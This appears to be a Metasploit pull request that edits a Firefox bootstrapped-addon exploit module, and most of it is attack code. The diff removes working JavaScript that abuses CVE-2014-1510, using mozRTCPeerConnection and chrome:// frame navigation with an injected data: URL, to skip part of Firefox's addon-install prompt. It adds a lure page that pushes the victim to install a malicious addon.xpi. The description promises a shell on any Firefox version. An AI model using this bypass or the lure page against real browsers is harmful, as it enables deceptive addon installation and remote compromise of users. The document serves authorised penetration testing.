### PR TITLE
Revert "Add initial firefox xpi prompt bypass." change to XPI module for Firefox 22-27

### DIFF
--- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
+++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
@@ -28,18 +28,13 @@ class Metasploit3 < Msf::Exploit::Remote
         be "bootstrapped". As the addon will execute the payload after
         each Firefox restart, an option can be given to automatically
         uninstall the addon once the payload has been executed.
-
-        On Firefox 22.0 - 27.0, CVE-2014-1510 allows us to skip the
-        first half of the permissions prompt.
       },
       'License'       => MSF_LICENSE,
       'Author'        => [ 'mihi', 'joev' ],
       'References'    =>
         [
           [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
-          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ],
-          [ 'CVE', '2014-1510' ], # webidl chrome:// navigation to skip first half of prompt
-          [ 'CVE', '2014-1511' ]
+          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]
         ],
       'DisclosureDate' => 'Jun 27 2007'
     ))
@@ -72,42 +67,10 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def generate_html
-    %Q|
-      <html><head><title>Loading, Please Wait...</title></head>
-        <body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>
-        <div style='visibility:hidden;width:1px;height:1px;'>
-          <iframe name='f'></iframe>
-        </div>
-        <script>
-          function install() {
-            window.location.href="addon.xpi";
-          }
-          #{web_idl_navigation}
-        </script>
-        </body>
-      </html>
-    |
-  end
-
-  # In firefox 21 - 27, there is a vulnerability that allows navigation to a chrome:// URL.
-  # From there you can load the browser XUL, and inject a data URL into a nested frame.
-  # If the data URL opens the .xpi URL, the first permission prompt gets skipped.
-  def web_idl_navigation
-    %Q|
-      try {
-        c = new mozRTCPeerConnection;
-        c.createOffer(function(){},function(){window.rr=window.open('chrome://browser/content/browser.xul', 'f')});
-        setTimeout(function(){
-          try {
-            frames[0].frames[1].location="data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
-                                  "{},function(){window.open('#{get_uri.chomp('/')}/addon.xpi', '_self');});<\\/script>";
-          } catch(e) {
-            install();
-          }
-        },600);
-      } catch(e) {
-        install();
-      }
-    |
+    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
+    html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|
+    html << %Q|<script>window.location.href="addon.xpi";</script>\n|
+    html << %Q|</body></html>|
+    return html
   end
 end


### PR DESCRIPTION
The versions of firefox that this bypass worked for are now covered by the exploit [Firefox WebIDL Privileged Javascript Injection](http://www.rapid7.com/db/modules/exploit/multi/browser/firefox_webidl_injection), so you might as well get a shell instead. Otherwise this code is bloating the module and adding a ~600ms delay to install, so I am removing it.
#### Verification
- [x] `msf> use exploits/multi/browser/firefox_xpi_bootstrapped_addon`
- [x] `msf> run`
- [x] Get a shell on any firefox version
